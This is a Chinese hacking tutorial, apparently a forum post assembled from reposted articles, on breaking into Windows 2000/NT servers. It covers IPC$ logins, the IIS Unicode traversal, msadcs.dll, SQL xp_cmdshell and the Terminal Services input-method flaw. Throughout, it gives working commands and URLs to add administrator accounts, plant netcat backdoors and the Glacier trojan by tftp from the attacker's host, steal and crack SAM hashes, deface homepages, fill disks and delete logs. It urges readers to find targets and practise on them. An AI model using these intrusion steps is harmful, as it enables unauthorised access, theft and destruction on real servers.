| 关键词: xxx exe scripts system winnt 文件 漏洞 http cmd 命令 |
早就答应ekin 和jesse 写些原创的东西呵呵我个菜鸟能写什么呢?经过wowo和蚂蚁的指教,我想还是把这些刚学来的,趁热就卖了吧:) win2000的漏洞我知道的也就这几个在这献丑了 先什么呢?????就ipc$吧毕竟这个好理解 什么是ipc$ 我就不说了,我也不大明白 ipc探测大多基于139 用的工具当然是流光了呵呵其实还有别的工具也可以探测,我个人认为还是流光好.怎么用流光的ipc探测帮助里写的相当相当详细了 流光的帮助是我见过黑客教学最傻瓜的了大家 知道探测出密码了,可以用种植者 种植但是有时启动不起来那还要我们来帮助它吧 呵呵net use \\**.**.***.***\ipc$ "密码" /user:"这个你自己猜吧" *** 是目标的位置就是ip 好象这是废话 呵呵 copy \tools\srv.exe \\202.**.**.**\admin$\system32 这个就是把srv.exe 复制到 肉鸡上 net time \\203.161>**.** 这个就是查看肉鸡的时间 比如说是 02:22 这个有可能是 02:22 还有可能是 14:22 at \\203.**.**.** 9:02 srv.exe 这样就启动了 srv.exe了 然后就telnet 203.**.**.** 99 (srn.exe 其实就是在99端口开启个后门 呵呵) 上去了吧 哈哈对了上去也不代表我就控制了机器呀 对呀 你还要成为管理员 这样就方便多了呵呵 命令是 net user 用户 /add 这个是创建个用户 net localgroup administrators 用户 /add 这呀就是把刚才你加的用户加到管理员权限里 好了现在你是管理员了 呵呵 2000的一个很有用的就是做跳板 netsvc \\127.0.0.1 telnet /stop netsvc \\127.0.0.1 telnet /start 这两个命令最好还是在肉鸡上执行 好象快点 好了ipc就介绍到这吧 其实net命令很有用的强烈推荐大家 好好看看命令详解 下面呢????好就cgi吧哈哈这个好象难了点 我看见不少人都问怎么用好我就给大家介绍介绍 我其实也不怎么熟的 呵呵这是 我转来得大家 好好看看 我也懒 一、Unicode漏洞的实现 要利用unicode利用,先要知道如何实现,通常,我们通过以下几种途径来利用Unicode漏洞: -http://www.exsample.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ http://www.exsample.com/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 如果浏览器返回C:的目录列表,那么就可以继续了。其中,从dir开始是真正的命令,用+连接命令。(注:下面将不再把前面的地址写上,直接为命令) 二、如何修改对方主页? 通常,在系统盘的目录下有Inetpub目录.其中有个wwwroot目录是用来存放主页空间的。 先dir+C:\Inetpub\wwwroot\察看目录: 返回: ====================================================== Directory of C:\inetpub\wwwroot 2001-01-31 22:56 . 2001-01-31 22:56 .. 1999-06-03 23:13 342 help.gif 1999-12-16 16:44 1,628 iisstart.asp 2001-01-31 22:56 images 1999-12-16 16:44 6,566 default.asp 11 File(s) 23,885 bytes 5 Dir(s) 126,048,256 bytes free ========================================================= 接着:我们就 del+c:\inetpub\wwwroot\default.asp echo+Hacked%20By%20Hacker%20>+c:\inetpub\wwwroot\default.asp 利用echo命令和重定向符号创建新文件. 三、如果主页不在默认路径下,如何知道在哪里? 我们可以到他的主页上,选取他的标题图片,右键点击,看它的文件名。比如:exsample.gif 于是,我们用: dir+c:\exsample.gif/s dir+d:\exsmaple.gif/s ... 这样可以搜索到它的标题图片,通常在主页的images目录下,那么这个目录的上级目录就是存放主页的。 按照二中所讲的方法可以修改其主页。 四、如何将文件上传? 这个是我们最关心的了,因为一旦上传了如ncx99一样的程序,那么有些事就好办多了。偷懒的人也许上传个冰河上去:)。 方法:(俗称ftp方法) 1.首先,申请个ftp账号(可以用ftp的主页账号也可),不要填真实身份哦! 2.将你要上传的文件上传到该ftp服务器上。 3.然后,在unicode漏洞的机器上,建立文件,用echo命令: echo+open ftp.xxx.com(ftp主机) > c:\temp.1 (可以随便取个名字,最好放到隐蔽的地方) echo+user yourname >> c:\temp.1 yourname是你的用户名 echo+yourpasswd >> c:\temp.1 yourpasswd是你的密码 echo+get ncx99.exe >> c:\temp.1 你要下载的文件 echo+quit >> c:\temp.1 4.执行ftp,用参数s ftp+/s:c:\temp.1 好了,过一会儿,用dir察看当前目录,就会看见ncx99.exe,酷!接下来如何,不用说了吧! 五、如何做个很大的文件? 我们可以用bat文件来实现。用echo建立如下文件,注意扩展名为bat: @echo off echo big > x.x :w copy x.x+x.x x.x goto w 这样,就会……呵呵,不用说了吧,但这个好像不好。也可以上传个程序过去。这个只不过比较方便。 六、万一遇到长文件名怎么办? 这是很菜鸟的问题,但确实有人不会用,我在这里简单地说一下: 例如: c:\program files\microsoft billgates\hackermanandwoman.txt 如何表示?用: c:\"program20%files"\"microsoft20%billgates"\hackermanandwoman.txt 七、如何删除脚印(日志)? 用如下命令: del+C:\winnt\system32\logfiles\*.* del+C:\winnt\ssytem32\config\*.evt del+C:\winnt\system32\dtclog\*.* del+C:\winnt\system32\*.log del+C:\winnt\system32\*.txt del+C:\winnt\*.txt del+C:\winnt\*.log 八、如何创建新的用户名,并将用户名加入Administrator组?这个不一定会成功,由于你没有足够的权限。除非碰到一些傻瓜网站。 我们可以用echo创建一个bat文件。包含一下命令: net user Myname MyPasswd /add /expires:never net localgroup "administrators" /add Myname 然后,执行这个bat,就可以了。记得把它删除哦! 九、如何获得SAM数据库? 先用上传文件的方法上传samdump,然后用它把sam库拷贝到别的地方(直接下载SAM库是不行的)。 比如samdump C:\winnt\system32\config\sam C:\temp.aaa 然后在把temp.aaa上传到你的ftp服务器上,也可以把它拷贝到主页目录下,用浏览器下载。 本篇文章允许转载,但请注明由eastdark所著 呵呵 上面说的 其实很简单的 http://*****.***>***/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 这个就是最经典的unicode漏洞了 最主要是能用命令呵呵 /winnt/system32/cmd.exe?/c+这个后面就是用命令的地方 比如要看system32 文件夹的内容 就是 /winnt/system32/cmd.exe?/c+dir+c:\winnt\system32 还有别的命令 呵呵 ../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam._+c:\inetpub\wwwroot\ 这个就是把 sam复制到wwwoot 呵呵到了那你知道要干什么了吧 当然了下载后破解密码呀 哈哈对了破解密码的时间可不短呀 呵呵 不管是什么漏洞都是为了得到管理员权限 我们既然把srv.exe复制到肉鸡上了当然是启动他了 用 ftp你可以自己社定地址 比如你把srv.exe复制到C:\Inetpub\scripts\里了 启动它就是 winnt/system32/cmd.exe?/c+C:\Inetpub\scripts\srv.exe 既然启动你还塄着干什么 telnet 呀 呵呵 还是 99 端口呀 我再给大家介绍一篇 最近这些日子好多的WINNT的服务器被黑,尤其是国内的。下面是一些具体示例的总结。 下面这类型的漏洞以发现近一年多了,一年多前在国外的黑客网站就有了类似的文章,但是当时 并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。 不过直到UNICOUDE漏洞的发现,黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总结一下。 希望大家能从这里体会到点什么。(下面的文章来自一些邮件列表和BBS) 原理:(其实原来都很相似,我拿这个做个例子。) NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞, 导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode 字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执 行某些web根目录以外的文件。 对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh" 或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统 认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00采用的 解码的格式与下面的格式类似: %c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh %c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh 因此,利用这种编码,我们可以构造很多字符,例如: %c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' 攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。 (1) 如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能 列出当前目录的内容: http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir (2) 利用这个漏洞查看系统文件内容也是可能的: http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,此问题同样 存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c". 下面我们的例子以%c1%1c为主讲解。 注:+号可以用%20代替,依这种格式你还可以构造出许多命令 好多站点\inetpub\下的scripts目录删除了, 但\Program Files\Common Files\System\下 的msadc还在(有msadcs.dll漏洞的话就不用 %c1%1c了)。这时可以如下构造请求: http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 实践一:(修改主页----最简单化的一种) 很多入侵都以修改主页的形式表现出来,这通常有两种情况:一是表达自己的 愤慨——比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后,国内很多黑客 在ICQ、BBS一呼百应,纷纷对敌国进行各种形式的攻击,当然以替换主页最为大快人心! 二是在给网管发e-mail漏洞报告之后没反应,有的黑客按耐不住,就用修改主页的方式给予警告, 用以引起人们对于安全技术的重视。当然说起来这是违法的啦,所以大家要注意哦,不要光图一时的痛快, 呵呵! 可以使用ECHO命令、管道符等建立文件,修改文件内容。但因为IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符“&|(,;%”,如果发现有这些字符就会返回500错误,所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法绕过去。 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe 然后 http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp 就改了主页了! 这种方法对于有负载均衡的主机很不方便,又需要几次才能完成,所以不好。袁哥给出了另一种更方便的办法。参考袁哥(yuange)的帖子《IIS不用拷贝CMD.EXE使用管道符等的方法》,可以这样: http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+>+f:\wwwroot\xxx\default.asp http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwroot\xxx\default.asp 这样,主页就被更改成了: Hacked by hacker 12/1/2k 当然我是没有这样做啦,不过这些东西我都在自己配置的环境下实现了, 在我练习的过程中发现,用ECHO写这些的时候很慢,如果你多次回车,过一阵屏幕刷新后主页上就会留下多个 你要写的内容。 实践二(下载SAM文件) http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32 /cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件, 执行: http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?/c +copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制, 执行http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。 随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的: 获得Administrator权限。 执行http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\ 把sam._文件拷贝到wwwroot文件内,输入http://xxx.xxx.xxx.xxx/sam._ 将sam._文件下载到本地,执行: http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c +del%20c:\inetpub\wwwroot\sam._清除痕迹。 在本机执行:C:>expand sam._ sam 启动l0phtcrack 2.5(可http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File... 打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个 觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏, 网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin 扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$ 123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录: winnt\system32\logfiles 看了看,呵呵! 实践三(用木马) 如果你对net use的使用不熟悉的话,可以找找相关的资料来看,net命令也是基本技能啊,好好掌握吧) 在本地设定一个共享目录,比如f:\123,把ncx99.exe和冰河服务端放在里面,同时为了试验, 放了一个0字节的1.txt;然后再tftp98中把目录指向f:\123,现在就要让对方运行tftp.exe来下载文件啦! http://xxx.xxx.xxx.xxx/scripts/cmd.exe?/c+copy+c:\winnt\system32\tftp.exe%20f:\wwwroot\scripts 然后 http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+1.txt+cosys.txt (111.111.111.111表示我们的ip,或者是我们的tftp服务器ip) 看,返回下面的内容: CGI 錯誤 所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是: Transfer successful: 0 bytes in 2 seconds, 0 bytes/s 这就成功啦!看看: http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c+dir+1.txt 果然有的,哈,继续: http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+ncx99.exe+scripts.exe 现在继续把冰河弄上去,国货精品,也让同胞们看看嘛!这是最方便的啦,哈哈! http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+G_Client.exe+c:\winnt\system32\iinter.exe 返回: CGI 錯誤 所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是: Transfer successful: 266240 bytes in 271 seconds, 982 bytes/s 成功啦,这样,我们就可以先让它中木马啦! http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/inter.exe 之后,用客户端连接过去,找到自己需要的东西,什么?你不知道你需要什么? 那你进去干什么?!学习啊?好啊,学到什么啦?总结一下,把纪录删掉(或者改写?覆盖?你自己想吧) 实际四(暴力法和权限升级) 在WIN2000的命令提示符下 这样输入 c:\>newletmein xxx.xxx.xxx.xxx -all -g xxx.xxx.xxx.xxx是你要攻击的网站的IP地址 然后等待程序执行完毕,如果发现可用的用户名和密码,程序会告诉你,记住这个 用户名和密码,再这样输入(这里假设用户名为ADMIN。密码也是ADMIN) c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN" 程序显示命令完成,接着来 c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32 程序显示1个文件COPY成功 接着来 c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32 程序显示1个文件COPY成功 接着来 c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start 等显示成功,接着来,这里假设对方时间为13:00(这里可以用NET TIME看时间) c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg 程序会告诉你这个命令的ID号,等时间一到,用木马连他的机器的65432端口 可以加上自己的密码,和更改端口,目标搞定 2,目标开了WEB服务,IIS有漏洞msadcs.dll漏洞,这个漏洞可以用TWWWSCAN扫描 到,为了确认这个漏洞,你可以在浏览器的网址栏里输入这个文件的具体路径来确认 IE将显示application/x_varg,说明这个漏洞存在,然后在PERL下,进行攻击 C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx Please type the NT commandline you want to run (cmd /c assumed):\n cmd /c 一般这里我用TFTP上传我的木马文件,但首先你得先设置好你的TFTP主机 tftp -i 127.0.0.1 get ntsrv.exe c:\winnt\system32\ntsrv.exe 这里127.0.0.1 是我的TFTP主机,TFTP目录下有NTSRV。EXE木马 如果程序执行成功,TFTP会显示文件传输的进度,然后再执行PERL,将木马激活 ,你再用木马连上对方的机器,搞定 3,目标开了WEB服务,而且有SQL服务,一般SQL服务器开1433端口 如果WEB服务器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原码, 而且把用户名或者密码写在这里,OK,你已经差不多搞定拉 打开SQL SERVER 7。0 在client network uitlity里输入对方IP,通讯选TCP/IP 端口选1433,然后应用确定,再打开query analyzer SERVER选你要攻击的 IP,用户名和密码输入,连接他,等会,连上拉 在上面这样输入 create proc #1 as exec master..xp_cmdshell'dir c:\' go exec #1 按F5执行,会显示对方机器的文件目录,然后用TFTP上传你的木马,并且执行,再用木马连接他 搞定(需要注意的是PROC的号要执行1次换1个,单引号间是命令行) 4,目标开了WEB服务,IIS有漏洞,这里要说现在比较普遍的双字节编码漏洞。理论 这里不说,也说不好,照着干就可以拉。发现目标XXX。XXX。XXX。XXX 在浏览器里输入 http://xxx.xxx.xxx.xxx/.idq 显示路径,WEB是在那里 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 这样我们将得到对方的文件目录 然后这样 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe 等文件传完,再这样 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\winnt\system32\ntsrv.exe 木马被启动,用木马连上,搞定。 如果权限不够,我们下面来升级权限 自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下, (这三个文件是黑NT毕备的,很多站点可以下载到) 可以到DOS下输入:(下面是NETUSE后的盘,如果不懂,先学NETUSE去) C:\>copy c:\gasys.dll F:\ 1 file(s) copied. C:\>copy c:\cmd.exe F:\ 1 file(s) copied. C:\> copy c:\getadmin.exe F:\ 1 file(s) copied. 至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E : http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c+copy+e:\winnt\system32\cmd.exe+e:\inetpub\scripts\hackercn .exe 这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘: http://127.1.1.1/scripts/hackercn.exe?/c+net+use+Y:+\\127.1.1.2\E 然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次): http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c+copy+Y:\gasys.dll+d:\inetpub\scripts\gasys.dll http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c+copy+Y:\cmd.exe+d:\inetpub\scripts\cmd.exe http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c+copy+Y:\getadmin.exe+d:\inetpub\scripts\getadmin.exe 好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做: http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS 这样所有的访问者都有了Administrator限权, 然后我们再来新建一个用户名为hacker密码为password的用户: http://127.1.1.1/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add 然后再把它授予Administrator限权: http://127.1.1.1/scripts/getadmin.exe?hacker 下来就是进入该系统并制作后门了: 在nt的dos下输入 C:\>net use \\127.1.1.1\ipc$ "password" /user:"hacker" 现在你已经登陆到了他的主机上,然后上传木马冰河: C:\>copy C:\unzipped\newglacier\G_Server.exe \\127.1.1.1\admin$\system32 然后用net time来获得对方的时间: C:\>net time \\127.1.1.1 假设对方的时间是5点40,那么我们将在5点43启动冰河程序: C:\>at \\127.1.1.1 05:43 G_Server.exe 这样我们就完整的实现了一次入侵,别忘了最后要打扫战场 用冰河很讨厌,我个人是不赞成用木马的,我们可以上载其他端口程序。 实践五(简单实用) 我们假设1.29.58.9有这类型漏洞 myip就是我的IP,GIFT是我计算机上共享的文件名。我把NCx99.exe那个文件放到这个目录下了。 http://1.29.58.9/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\gift 时间要长点,多等一会儿。 成功后,你就可以用COPY命令,把NCX99.EXE文件从I盘CP过来了(放在system32或你喜欢的目录下) http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+i:\gift\ncx99.exe+c:\inetpub\scripts\ncx99.exe 启动ncx99.exe http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\ncx99.exe 用telnet连上就可以了。 如果权限不够可以用上面我们讲的方法来增加权限。或添加用户。 实践六(打扫战场) 打扫战场 最后一步就是清除我们用到的一些临时文件和测试的文件,伪装一下日志, 免得被发现,这就叫做是打扫战场。然后记得卸载冰河啊,我们不是过去破坏的, 只是为了学习和研究,熟悉入侵的手段和思想,学会分析问题,解决问题,为将来的实战做个练习而已嘛! 所以也不要修改主页啦!给他们的网管留一份e-mail也好啦! 其实,我们传上去的ncx99.exe是netcat的另一个版本,运行后,会把cmd.exe绑定到99端口, 也就是说,运行以后,会在99端口侦听,我们可以用telnet连接。 C:>telnet xxx.xxx.xxx.xxx 99 就看到: c:\inetpub\scripts> 呵呵,现在就相当于进入他的机器啦,后面的东西不用继续说了吧?键入exit退出后,对方的ncx99也退出啦。如果你真的想要他的管理员账号,那么,我想,最起码可以这样:传个纪录键盘的东东上去,怎么样?比你破解简单多啦!你当然也可以用冰河什么的。你也可以给自己建个账号,方便自己,不过很可能会被发现的啦。 好啦好啦,不再说啦,烦死人了。 如果你用了木马,就要想办法去掉,要不就留到以后用。随你了。 这么一次入侵完成了,我们至少要学会入侵的基本步骤,还有入侵的思维方式啦。 好好体会吧。 实用命令总结: 列目录: http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Copy文件 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\ NET USE的使用 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\temp 改CMD方法 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe 然后 http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+> +f:\wwwroot\xxx\default.asp FIND命令使用 比如我要查看WEB目录d:\inetpub\wwwroot下的所有asp、asa文件的内容: http://xxx.xxx.xxx.xxx/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as* 添加用户命令 新建一个用户名为hacker密码为password的用户: http://127.1.1.1/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add 当然命令是构造出来的,利用这些规则我们可以写很多的类似的命令。 也希望大家把自己构造的好的想法和实现贴出来 如果你找不到目标可以去www.goole.com找。 它的危害大家我想都知道了。 呵呵 大家多练习呀 对了好象上面的 ftp 传文件很困难 是吧我也是 呵呵其实有个好工具哦 有了它你就有对 Unicode漏洞的实现 我看哪个工具就是专门给Unicode漏洞用的 工具: tftpd32.exe(一个FTP服务器) ncx99.exe(telnet 到99端口) 这两个大家都熟悉吧,其他的不用管。 运行tftpd32.exe 这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。 回到你的浏览器,在地址栏里填入: http://202.111.111.11/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%???.???.???.???%20GET%20srv.exe%20c:\\inetpub\\scripts\\srv.exe ???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\srv.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情 况而定,srv.exe为被改名的ncx99.exe(自己选名字吧)。 然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。 再使用如下调用来执行ncx99.exe(srv.exe) http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe 然后您就可以 telnet 202.111.111.11 99 以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定,这只是一个方法。 srv.exe 这个其实就是ncx99.exe 呵呵你也可以自己改名字呀 好了 cgi 就将到着了 要想更深入了解 你还是自己找专门介绍cgi 的文章吧无心的cgi大全就很不错的 好了 该将我最喜欢的 3389 了 什么是终端服务就是让管理员远程管理计算机的但在输入法里有个致命漏洞 这样就对我们方便多了你可以用上面的ipc 和cgi 漏洞得到管理员权限 在用3389 远程管理 好了该开始将 输入法漏洞了 实际上我把3篇相关文章放到一起呢,我比较喜欢第一种实际测试中也证明非常好用可以完全成功的。 如何利用终端服务入侵远程计算机 by coolweis [email protected] 用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。 恶意用户可以通过猜密码进入系统,更危险的是,如果这台机器存在输入法漏洞的话,那么入侵者 可以完全控制这台机器。 下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器: 首先我们确定某台机器的3389端口是开放的: D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx Starting nmapNT V. 2.53 by [email protected] eEye Digital Security ( http://www.eeye.com / ) based on nmap by [email protected] ( www.insecure.org/nmap / ) Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx): Port State Service 3389/tcp open msrdp Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds D:\TOOLS\nmapNT\Nmapnt> 现在我们已经可以看到这台机器的终端服务是开放的,那么我们就可以开始行动了。 打开终端服务客户端,添上IP地址,选择连接。 稍等片刻,一般是很快的,就会出现熟悉的登陆对话框了,这是我们看看有没有输入法的漏洞。有关 输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢?经过多次的研究试验。 终于想出了一个办法。我们发现在跳至url后,我们双击winnt目录下的explorer.exe并没什么反应(是 机上已经运行了,可是我们为什么看不到结果呢?),如果我们不断的进行双击,或者什么也不做,一 会儿连接将被断开,在断开的一霎那,我们似乎看到了我们双击出来的窗口。经过几次试验,我们发现 不登陆进去是不行的,将会被服务端断开。于是想办法先登陆进去,我想到了在帮助中打开用户管理器, 经过试验,在跳至url中添入:mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm 在右侧会出现一个可以打开本地用户和组的管理器的链接,本来在正常情况下是可以打开这个管理器的, 可是在没有登陆进去的时候就是出不来,于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳 至url中输入:c:\winnt\system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了 一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们 的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了, 添加个账号test的命令如下,C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方 式运行它。然后我们把这个账号添加到administrators组中, C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了, 关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的 TSinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后 再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。 这台机器就这样控制在我们的手里了。。。。。。 主题:到他机器去跳舞(输入法漏洞之完全心得及问题) elise 初级会员 发贴数量: 13 来自: 注册日期: Jan 2001 由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。 小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功入侵并装个后门(现在流行走后门^^)。 其过程如下: 1.扫描 3389 port 终端服务默认; 2.用终端客户端程序进行连接; 3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门; 4.在"选项"菜单上点右键---> 跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定); 5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成; 6.打开IE,输入http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步; 7http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat 8http://ip/scripts/cmd.exe?/c echo net user guest elise>> go.bat 9http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat 10http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下: net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行; 